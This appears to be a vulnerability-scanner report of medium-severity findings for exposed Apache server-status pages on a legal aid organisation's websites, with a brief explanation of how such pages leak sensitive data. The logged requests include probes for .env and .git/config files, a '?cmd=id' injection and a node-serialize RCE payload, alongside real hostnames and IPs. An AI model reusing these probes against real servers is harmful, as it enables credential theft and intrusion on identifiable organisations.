Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea908f97ea
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:51 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 10 seconds Server load: 0.17 0.05 0.01 Total accesses: 2347948 - Total Traffic: 111.6 GB CPU Usage: u66.77 s7.3 cu0 cs0 - .00157% CPU load .497 requests/sec - 24.8 kB/second - 49.9 kB/request 25 requests currently being processed, 0 idle workers WKWKWKWWWKWKKKKKWKWWWKWWK....................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284394/5/149108W 0.520036.00.107129.89 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 1-54282741/19/146308K 0.60401.10.437406.34 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 2-54282794/18/138686W 1.68007.70.366786.81 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 3-54284441/2/138058K 0.4935831.00.006843.67 130.176.17.72http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1660781147.80352592468261718750 4-54284513/3/132812W 0.6800231.10.236872.41 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-54277791/74/127549K 5.68471.51.886305.79 204.246.166.105http/1.1secure.alas.org:8080GET / HTTP/1.1 6-54284274/7/123202W 1.440035.70.156154.79 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279602/50/116758W 5.44002.31.075991.77 70.132.63.132http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-54284282/6/111210W 1.93002.00.015413.77 70.132.63.132http/1.1intranet.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 9-54284524/4/109795K 0.520938108.20.115360.51 70.132.63.132http/1.1atlantalegalaid.org:8080GET /.DS_Store HTTP/1.1 10-54284613/3/103116W 0.430066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284623/3/90822K 0.220034.30.034417.10 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 12-54284632/2/81746W 0.220033.30.034061.23 70.132.63.132http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-54283941/5/76020K 1.1842721.00.023612.13 204.246.166.105http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-54277906/74/71384K 5.78045347.53.213477.89 70.132.63.132http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284645/5/68073K 0.29084472.70.073513.42 70.132.63.132http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-54284811/1/58812W 0.210032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283051/14/48131K 1.34416141.40.462319.79 204.246.166.105http/1.1survey.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00001.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/0/40554W 0.00000.00.001989.56 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00001.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284891/1/35243K 0.1705090.90.001733.89 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 22-54284901/1/38395W 0.00001.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284910/0/34534W 0.00000.00.001616.39 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 24-54284921/1/31216K 0.00001.00.001521.95 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 25-54-0/0/16882. 0.00676400.00.00728.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-54-0/0/11324. 0.00676300.00.00570.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-54-0/0/11698. 0.00676200.00.00472.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-54-0/0/9875. 0.00676100.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9775. 0.00676000.00.00403.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54-0/0/10662. 0.00675900.00.00492.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-54-0/0/9049. 1.36583900.00.00376.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-54-0/0/10167. 0.00675800.00.00452.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-54-0/0/10591. 0.55607200.00.00457.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-54-0/0/10171. 1.17574800.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54-0/0/10772. 0.00675700.00.00445.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-54-0/0/9039. 0.00675600.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54-0/0/10086. 0.00675500.00.00404.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-54-0/0/8214. 0.00675400.00.00401.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-54-0/0/9918. 0.00675300.00.00383.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-54-0/0/10171. 0.00675200.00.00360.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54-0/0/2149. 0.001637600.00.0078.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-54-0/0/1042. 0.001637500.00.0040.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-54-0/0/1034. 0.001631600.00.0044.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-54-0/0/631. 0.001637400.00.0071.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-54-0/0/987. 0.001637300.00.0052.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-54-0/0/682. 0.001637200.00.0017.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-54-0/0/1009. 0.001637100.00.0046.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-54-0/0/685. 0.001637000.00.0020.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54-0/0/694. 0.001636900.00.0021.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-54-0/0/623. 0.001636800.00.0028.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-54-0/0/738. 0.001636700.00.0027.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-54-0/0/679. 0.001636600.00.0021.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-54-0/0/494. 0.001636500.00.0020.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-54-0/0/618. 0.001636400.00.0025.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-54-0/0/444. <
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979b44a8448
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 10-Jan-2026 00:51:46 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 45 days 8 hours 14 minutes 55 seconds Server load: 0.00 0.00 0.00 Total accesses: 43756 - Total Traffic: 1.7 GB CPU Usage: u49.88 s4.17 cu0 cs0 - .00138% CPU load .0112 requests/sec - 474 B/second - 41.5 kB/request 1 requests currently being processed, 9 idle workers ______..__.._W.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-45182190/100/3384_ 5.4612300.01.93137.50 143.198.179.104http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-45183390/61/3654_ 7.381212160.03.11150.87 130.176.208.182http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 2-45230130/7/3445_ 0.84222750.00.61140.33 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-45230180/2/3567_ 0.281401560.00.07143.77 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1768006159.193562984466552 4-45179090/81/3218_ 8.171081320.02.69135.62 130.176.208.182http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-45179190/50/3006_ 6.061312550.02.19136.87 130.176.208.182http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 6-45-0/0/3533. 0.00937300.00.00144.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-45-0/0/3305. 3.33937000.00.00130.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-45179210/62/2986_ 4.84297500.01.37119.03 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-45211600/59/2589_ 4.29192740.02.11107.73 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-45-0/0/2493. 0.00937100.00.00100.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-45-0/0/2400. 0.002534700.00.0099.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-45179100/125/2146_ 3.671162210.02.0679.71 130.176.208.182http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 13-452178117/37/1022W 1.660019.21.6736.79 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 14-44-0/0/1161. 1.386843300.00.0040.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-43-0/0/552. 4.091528042300.00.0015.29 15.158.22.110http/1.1atlantalegalaid.org:8080GET /galex.php HTTP/1.1 16-43-0/0/609. 2.6015316300.00.0031.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-43-0/0/273. 0.0020631800.00.009.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-43-0/0/116. 0.0020631700.00.000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-43-0/0/24. 0.0020631600.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-43-0/0/42. 0.0020631500.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-42-0/0/43. 0.0024148800.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-42-0/0/43. 0.0024148900.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-42-0/0/26. 0.0024149100.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-42-0/0/119. 0.0024148700.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9796ba9cab4
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 02-Jan-2026 19:39:18 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 38 days 3 hours 2 minutes 27 seconds Server load: 0.00 0.00 0.00 Total accesses: 37438 - Total Traffic: 1.4 GB CPU Usage: u68.91 s5.25 cu0 cs0 - .00225% CPU load .0114 requests/sec - 471 B/second - 40.5 kB/request 1 requests currently being processed, 9 idle workers _....__W______.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-384690/23/2849_ 3.3630700.01.31115.91 64.252.113.198http/1.1atlantalegalaid.org:8080GET /wp-content/uploads/ HTTP/1.1 1-38-0/0/3150. 4.1630000.00.00125.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-38-0/0/3004. 6.5430200.00.00118.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-38-0/0/3054. 5.3229900.00.00120.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-38-0/0/2770. 0.1929800.00.00116.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-38297650/102/2579_ 10.843022110.03.85117.76 130.176.189.200http/1.1atlantalegalaid.org:8080GET /wp-includes/sodium_compat/ HTTP/1.1 6-3812430/2/3054_ 0.363032260.00.13123.82 130.176.189.247http/1.1atlantalegalaid.org:8080GET /wp-includes/Text/ HTTP/1.1 7-382977523/111/2819W 13.160026.65.23100.11 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 8-384760/24/2532_ 3.56231800.01.5199.13 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 9-38323330/31/2207_ 4.593032220.01.6481.97 130.176.189.229http/1.1atlantalegalaid.org:8080GET /wp-includes/js/ HTTP/1.1 10-387780/17/2163_ 2.873082220.01.1185.64 64.252.113.234http/1.1atlantalegalaid.org:8080GET /wp-content/themes/ HTTP/1.1 11-38301860/98/2034_ 9.16222720.03.7980.55 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 12-3812480/1/1755_ 0.103021430.00.0066.36 130.176.189.239http/1.1atlantalegalaid.org:8080GET /wp-includes/block-bindings/index.php HTTP/1.1 13-3812490/1/765_ 0.193012610.00.0726.34 130.176.189.206http/1.1atlantalegalaid.org:8080GET /wp-includes/block-bindings/ HTTP/1.1 14-38-0/0/1089. 0.0030100.00.0037.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-37-0/0/498. 0.007167900.00.0013.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-37-0/0/566. 2.425093200.00.0029.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-35-0/0/250. 3.4222635700.00.008.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-35-0/0/12. 0.0026395700.00.000.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-35-0/0/21. 0.0026395600.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-35-0/0/40. 2.8923793400.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-35-0/0/42. 0.0026395500.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-35-0/0/42. 0.0026395300.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-35-0/0/25. 0.0026395400.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-35-0/0/118. 1.0324986900.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979e87151aa
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 27-Dec-2025 06:27:26 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 31 days 13 hours 50 minutes 35 seconds Server load: 0.00 0.00 0.00 Total accesses: 30286 - Total Traffic: 1.1 GB CPU Usage: u53.05 s3.79 cu0 cs0 - .00208% CPU load .0111 requests/sec - 450 B/second - 39.6 kB/request 1 requests currently being processed, 7 idle workers _____._.W_...................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-32160510/1/2377_ 0.002200.00.0096.92 118.193.45.235http/1.1atlantalegalaid.org:8080GET /sitemap.xml HTTP/1.1 1-32160560/0/2492_ 1.562400.00.0097.87 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 2-32159050/1/2442_ 0.002300.00.0083.95 118.193.45.235http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 3-32159160/2/2424_ 0.00232740.00.30100.70 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-32160610/0/2255_ 8.21232720.00.0096.51 130.176.185.46http/1.1atlantalegalaid.org:8080POST / HTTP/1.1 5-31-0/0/2029. 4.7614500.00.0095.70 141.98.11.140http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-32159060/2/2512_ 0.002200.00.00101.67 118.193.45.235http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 7-31-0/0/2208. 10.601334100.00.0076.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-321591123/24/2152W 0.000026.60.0372.52 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-32159170/2/1844_ 0.00222730.00.4065.28 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-31-0/0/1807. 0.9714500.00.0069.24 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-31-0/0/1600. 10.571342000.00.0063.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-31-0/0/1477. 15.261342100.00.0053.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-31-0/0/617. 2.733110300.00.0020.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-28-0/0/808. 2.182593451530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.0029482300.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.0029482200.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.0029487400.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.0029487300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.0029487200.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00198991400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00198991300.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00198991200.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00198991000.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00198991100.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979f514b11b
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 24-Dec-2025 20:39:36 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 29 days 4 hours 2 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 27428 - Total Traffic: 1.0 GB CPU Usage: u63.79 s4.58 cu0 cs0 - .00271% CPU load .0109 requests/sec - 445 B/second - 40.0 kB/request 1 requests currently being processed, 9 idle workers _____.__W_.._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-29277750/33/2218_ 4.4424100.01.7590.77 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 1-29251560/44/2224_ 5.6433331440.02.1389.47 15.158.226.76http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 2-29277800/37/2216_ 6.652805270.00.9776.08 15.158.16.204http/1.1elearning.alas.org:8080GET /login/index.php HTTP/1.1 3-29294920/1/2175_ 0.0066900.00.0090.52 103.249.117.201http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 4-29251720/36/2072_ 3.72242740.01.5488.68 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-29-0/0/1840. 0.59333100.00.0089.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-29251670/75/2226_ 12.2733351030.04.0494.27 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-29258450/77/2002_ 5.47974140.03.5070.23 15.158.254.200http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-292585023/127/1940W 10.670026.63.8464.68 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-29258550/30/1660_ 3.58294500.01.0057.91 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 10-29-0/0/1610. 3.121288400.00.0063.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-29-0/0/1444. 0.004483100.00.0056.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-29258650/46/1186_ 6.57232810.02.7941.77 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 13-28-0/0/565. 3.47512742130.00.0018.35 15.158.40.136http/1.1atlantalegalaid.org:8080GET /application/.env HTTP/1.1 14-28-0/0/808. 2.18512741530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.008675300.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.008675200.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.008680400.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.008680300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.008680200.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00178184400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00178184300.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00178184200.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00178184000.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00178184100.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97949d198bd
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 23-Dec-2025 00:57:28 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 27 days 8 hours 20 minutes 37 seconds Server load: 0.00 0.00 0.00 Total accesses: 25533 - Total Traffic: 972.5 MB CPU Usage: u75.7 s5.38 cu0 cs0 - .00343% CPU load .0108 requests/sec - 431 B/second - 39.0 kB/request 1 requests currently being processed, 9 idle workers W____.._.__...__................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-271399823/32/2097W 0.950026.60.2976.24 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 1-27103250/126/1985_ 13.3919742180.06.2272.54 15.158.40.139http/1.1atlantalegalaid.org:8080GET /api/decode?payload=%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_ 2-27149390/38/2082_ 0.17212710.00.4271.20 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-27103300/134/2061_ 13.8319791250.05.2585.50 15.158.40.136http/1.1atlantalegalaid.org:8080GET /?cmd=id HTTP/1.1 4-27116170/24/1971_ 2.83221810.01.1784.84 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-27-0/0/1719. 0.445076400.00.0084.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-27-0/0/2042. 4.88857000.00.0085.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-27106150/48/1820_ 5.6388900.02.1563.90 130.12.180.82http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 8-27-0/0/1755. 0.005945300.00.0058.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-27108970/99/1472_ 9.2119752220.03.0953.05 15.158.40.170http/1.1atlantalegalaid.org:8080GET /api/decode?payload=%7B%22cmd%22%3A%22printenv%22%2C%22toke 10-27109020/74/1466_ 11.41196500.03.8450.72 15.158.40.170http/1.1atlantalegalaid.org:8080GET /.git/config HTTP/1.1 11-27-0/0/1407. 4.395076300.00.0054.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-27-0/0/1118. 